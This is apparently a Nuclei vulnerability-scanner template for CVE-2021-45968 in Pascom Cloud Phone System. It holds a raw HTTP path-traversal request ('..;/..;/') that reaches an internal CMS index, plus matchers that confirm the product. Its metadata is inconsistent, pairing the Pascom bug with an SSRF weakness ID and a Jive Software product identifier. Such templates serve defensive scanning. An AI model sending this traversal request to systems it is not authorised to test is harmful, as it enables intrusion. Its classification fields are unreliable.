52 lines
1.8 KiB
YAML
52 lines
1.8 KiB
YAML
id: CVE-2021-45968
|
|
|
|
info:
|
|
name: Pascom CPS - Local File Inclusion
|
|
author: dwisiswant0
|
|
severity: high
|
|
description: |
|
|
Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by the vendor to fix the Local File Inclusion vulnerability in Pascom CPS.
|
|
reference:
|
|
- https://kerbit.io/research/read/blog/4
|
|
- https://www.pascom.net/doc/en/release-notes/
|
|
- https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-45968
|
|
- https://jivesoftware.com/platform/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-45968
|
|
cwe-id: CWE-918
|
|
epss-score: 0.01828
|
|
epss-percentile: 0.86866
|
|
cpe: cpe:2.3:a:jivesoftware:jive:-:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 3
|
|
vendor: jivesoftware
|
|
product: jive
|
|
tags: cve,cve2021,pascom,lfi
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /services/pluginscript/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- | # Double parent to access CMS index
|
|
GET /services/pluginscript/..;/..;/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- | # Verifying CMS
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code_2 != status_code_1"
|
|
- "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS
|
|
condition: and
|
|
|
|
# digest: 4a0a0047304502206c0efbacfdafde2ec79ec46a079a8eaf416f28557928f38b4ca6688cf06a706f022100df0077e0cb9a0fc2f8e71c233dbec21b8766f741748ed573ac66242d9cbfa31a:922c64590222798bb761d5b6d8e72950
|